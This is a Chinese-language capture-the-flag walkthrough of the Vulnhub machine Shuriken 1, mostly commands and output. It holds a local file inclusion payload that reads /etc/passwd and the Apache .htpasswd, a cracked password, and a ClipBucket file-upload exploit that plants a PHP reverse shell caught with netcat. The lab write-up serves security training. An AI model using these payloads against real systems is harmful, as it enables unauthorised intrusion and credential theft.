Shuriken 1
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.163.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:1b:5b:15 1 60 PCS Systemtechnik GmbH
192.168.56.238 08:00:27:08:ec:f1 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.238
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.238 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 06:10 EST
Nmap scan report for bogon (192.168.56.238)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Shuriken
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp filtered http-proxy
MAC Address: 08:00:27:08:EC:F1 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.17 seconds
NMAP扫描结果表明目标主机有1个开放端口80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ nikto -h http://192.168.56.238
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.238
+ Target Hostname: 192.168.56.238
+ Target Port: 80
+ Start Time: 2022-11-29 06:16:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7916 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-11-29 06:17:09 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
发现了/secret/以及/login.html
──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl http://192.168.56.238/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="secret.png">secret.png</a></td><td align="right">2020-10-04 16:55 </td><td align="right">202K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.238 Port 80</address>
</body></html>
将图片下载到Kali Linux本地:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ wget http://192.168.56.238/secret/secret.png
--2022-11-29 06:19:14-- http://192.168.56.238/secret/secret.png
Connecting to 192.168.56.238:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207283 (202K) [image/png]
Saving to: ‘secret.png’
secret.png 100%[====================================================>] 202.42K --.-KB/s in 0.002s
2022-11-29 06:19:14 (79.3 MB/s) - ‘secret.png’ saved [207283/207283]
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ ls
nmap_full_scan secret.png
扫描一下有无其他目录或者文件:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ gobuster dir -u http://192.168.56.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.238
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/29 06:20:58 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.56.238/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.238/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.238/js/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.238/secret/]
/server-status (Status: 403) [Size: 279]
Progress: 217532 / 220561 (98.63%)===============================================================
2022/11/29 06:21:28 Finished
没有扫描出更有价值的目录,而/secret.png的图片文字是javascript,作者提示我们应该与javascript代码有关,仔细看首页index.php中有两个js代码,
<script src="/js/index__7ed54732.js"></script>
<script src="/js/index__d8338055.js"></script>
其中第一个代码将其放到在线JS代码格式化网站,这样看起来更加方便:
https://www.qianbo.com.cn/Tool/Beautify/Js-Formatter.html
将JS代码格式化以后为:
! function(a, e) {
for (var t in e) a[t] = e[t]
}(window, function(a) {
var e = {};
function t(n) {
if (e[n]) return e[n].exports;
var s = e[n] = {
i: n,
l: !1,
exports: {}
};
return a[n].call(s.exports, s, s.exports, t), s.l = !0, s.exports
}
return t.m = a, t.c = e, t.d = function(a, e, n) {
t.o(a, e) || Object.defineProperty(a, e, {
enumerable: !0,
get: n
})
}, t.r = function(a) {
"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(a, Symbol.toStringTag, {
value: "Module"
}), Object.defineProperty(a, "__esModule", {
value: !0
})
}, t.t = function(a, e) {
if (1 & e && (a = t(a)), 8 & e) return a;
if (4 & e && "object" == typeof a && a && a.__esModule) return a;
var n = Object.create(null);
if (t.r(n), Object.defineProperty(n, "default", {
enumerable: !0,
value: a
}), 2 & e && "string" != typeof a)
for (var s in a) t.d(n, s, function(e) {
return a[e]
}.bind(null, s));
return n
}, t.n = function(a) {
var e = a && a.__esModule ? function() {
return a.default
} : function() {
return a
};
return t.d(e, "a", e), e
}, t.o = function(a, e) {
return Object.prototype.hasOwnProperty.call(a, e)
}, t.p = "http://broadcast.shuriken.local", t(t.s = 0)
}({
0: function(a, e, t) {
a.exports = t("WdQY")
},
WdQY: function(a, e, t) {
"use strict";
function n(a, e, t) {
return e in a ? Object.defineProperty(a, e, {
value: t,
enumerable: !0,
configurable: !0,
writable: !0
}) : a[e] = t, a
}
t.r(e);
var s = t("kiQV");
function l(a) {
var e = a.host,
t = a.chatAlias,
n = a.callbackAlias,
s = a.lang;
return fetch(function(a) {
var e = a.host,
t = a.chatAlias,
n = void 0 === t ? "" : t,
s = a.callbackAlias,
l = void 0 === s ? "" : s,
i = a.lang,
c = void 0 === i ? "pl-PL" : i;
return "".concat(void 0 === e ? "http://broadcast.shuriken.local" : e)
.concat("/", "?_alias=")
.concat(n, "&_callbackAlias=")
.concat(l, "&_lang=")
.concat(c)
}({
host: e,
chatAlias: t,
callbackAlias: n,
lang: s
}))
.then((function(a) {
return a.json()
}))
.then((function(a) {
return {
chatAgentsAvailable: a.agents > 0,
callbackAsapAgentsAvailable: a.callbackAsapAgentsAvailable > 0,
callbackScheduleAgentsAvailable: a.callbackScheduleAgentsAvailable > 0
}
}))
}
t.d(e, "INTERVAL_TIME", (function() {
return i
})), t.d(e, "default", (function() {
return r
}));
var i = 5e3,
c = function() {},
r = function a() {
var e = this;
! function(a, e) {
if (!(a instanceof e)) throw new TypeError("Cannot call a class as a function")
}(this, a), n(this, "clearInterval", (function() {
e.agentsAvailabilityCheckInterval && (clearInterval(e.agentsAvailabilityCheckInterval), e.agentsAvailabilityCheckInterval = null)
})), n(this, "checkAgentsAvailability", (function() {
l({
host: e.host,
chatAlias: e.chatAlias,
callbackAlias: e.callbackAlias,
lang: e.lang
})
.then(e.updateAgentsStatus)
})), n(this, "startAgentsAvailabilityChecker", (function(a) {
var t = a.host,
n = a.chatAlias,
s = a.callbackAlias,
c = a.lang,
r = void 0 === c ? "pl-PL" : c;
e.callbackAlias = s, e.chatAlias = n, e.host = t, e.lang = r, e.clearInterval(), l({
host: t,
chatAlias: n,
callbackAlias: s,
lang: r
})
.then(e.updateAgentsStatus), e.agentsAvailabilityCheckInterval = setInterval(e.checkAgentsAvailability, i)
})), n(this, "registerFunctions", (function(a) {
var t = a.startGenesysSession,
n = void 0 === t ? e.startGenesysSession : t,
s = a.endGenesysSession,
l = void 0 === s ? e.endGenesysSession : s;
e.startGenesysSession = n, e.endGenesysSession = l
})), n(this, "startChatSession", (function() {
e.startGenesysSession(), e.chatInProgress = !0
})), n(this, "updateMedaliaScenario", (function(a) {
e.medaliaScenario = a
})), n(this, "updateAgentsStatus", (function(a) {
var t = a.chatAgentsAvailable,
n = a.callbackAsapAgentsAvailable,
s = a.callbackScheduleAgentsAvailable;
e.chatAgentsAvailable = t, e.callbackAsapAgentsAvailable = n, e.callbackScheduleAgentsAvailable = s
})), n(this, "quitChatSession", (function() {
e.endGenesysSession(), e.chatInProgress = !1
})), this.agentsAvailabilityCheckInterval = null, this.callbackAlias = "", this.callbackAsapAgentsAvailable = !1, this.callbackScheduleAgentsAvailable = !1, this.chatAgentsAvailable = !1, this.chatAlias = "", this.chatInProgress = !1, this.endGenesysSession = c, this.host = "", this.lang = "pl-PL", this.medaliaScenario = "", this.startGenesysSession = c
};
window.opbox.services.register({
serviceName: s.a
}, r)
},
kiQV: function(a) {
a.exports = JSON.parse('{"a":"opbox-customer-chat-service"}')
}
}));
//# sourceMappingURL=index_7ed54732.js.map
发现了主机名:broadcast.shuriken.local
将其加入到/etc/hosts文件中
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.238 broadcast.shuriken.local
访问http://broadcast.shuriken.local,弹出用户认证框,为basic认证
查看另一个JS代码,发现了一个URL:
http://shuriken.local/index.php?referer=
访问该url,似乎这是文件包含,但是与以往的本地文件包含不同,需要两个/
view-source:http://shuriken.local/index.php?referer=..//..//..//..//etc/passwd
从而得到/etc/passwd文件的内容:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
lightdm:x:106:113:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:107:117::/nonexistent:/bin/false
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
pulse:x:109:119:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:112:123:MySQL Server,,,:/nonexistent:/bin/false
HTTP basic认证密码放在.htpasswd,继续用本地文件包含:
http://shuriken.local/index.php?referer=..//..//..//..//..//..//etc//apache2//.htpasswd
在返回页面源代码中有.htpasswd内容
developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
用john工具破解:
──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ echo 'developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0' > hashes
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
9972761drmfsls (developers)
1g 0:00:00:09 DONE (2022-11-29 06:54) 0.1013g/s 218961p/s 218961c/s 218961C/s 9982..99686420
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
从而登录HTTP基本认证,成功登录以后,可知目标运行:ClipBucket
查一下相关漏洞:
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit clipbucket
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit) | php/webapps/44346.rb
Clipbucket 1.7 - 'dwnld.php' Directory Traversal | php/webapps/32802.txt
Clipbucket 1.7.1 - Multiple SQL Injections | php/webapps/34694.txt
Clipbucket 2.4 RC2 645 - SQL Injection | php/webapps/17325.py
Clipbucket 2.5 - Blind SQL Injection | php/webapps/20708.txt
Clipbucket 2.5 - Cross-Site Request Forgery | php/webapps/20666.html
Clipbucket 2.5 - Directory Traversal | php/webapps/20704.txt
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting | php/webapps/36524.txt
Clipbucket 2.6 - 'channels.php?time' SQL Injection | php/webapps/36532.txt
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting | php/webapps/36525.txt
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting | php/webapps/36526.txt
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting | php/webapps/36527.txt
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting | php/webapps/36528.txt
Clipbucket 2.6 - 'videos.php?time' SQL Injection | php/webapps/36531.txt
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting | php/webapps/36529.txt
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting | php/webapps/36530.txt
Clipbucket 2.6 - Multiple Vulnerabilities | php/webapps/18341.txt
Clipbucket 2.6 Revision 738 - Multiple SQL Injections | php/webapps/23252.txt
Clipbucket 2.7 RC3 0.9 - Blind SQL Injection | php/webapps/36156.txt
ClipBucket 2.8 - 'id' SQL Injection | php/webapps/45688.txt
ClipBucket 2.8.3 - Multiple Vulnerabilities | php/webapps/42457.txt
ClipBucket 2.8.3 - Remote Code Execution | php/webapps/42954.py
ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection | php/webapps/44250.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ searchsploit -m php/webapps/44250.txt
Exploit: ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection
URL: https://www.exploit-db.com/exploits/44250
Path: /usr/share/exploitdb/exploits/php/webapps/44250.txt
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Shuriken_1/44250.txt
利用任意文件上传漏洞将php shell上传至目标主机:
──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ curl -F "[email protected]" -F "plupload=1" -F "name=rshell.php" \
"http://broadcast.shuriken.local/actions/beats_uploader.php" -u developers:9972761drmfsls
creating file{"success":"yes","file_name":"1669723866241fca","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
http://broadcast.shuriken.local/actions/CB_BEATS_UPLOAD_DIR/
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.238] 55712
Linux shuriken 5.4.0-47-generic #51~18.04.1-Ubuntu SMP Sat Sep 5 14:35:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:14:22 up 1:08, 0 users, load average: 0.00, 0.00, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$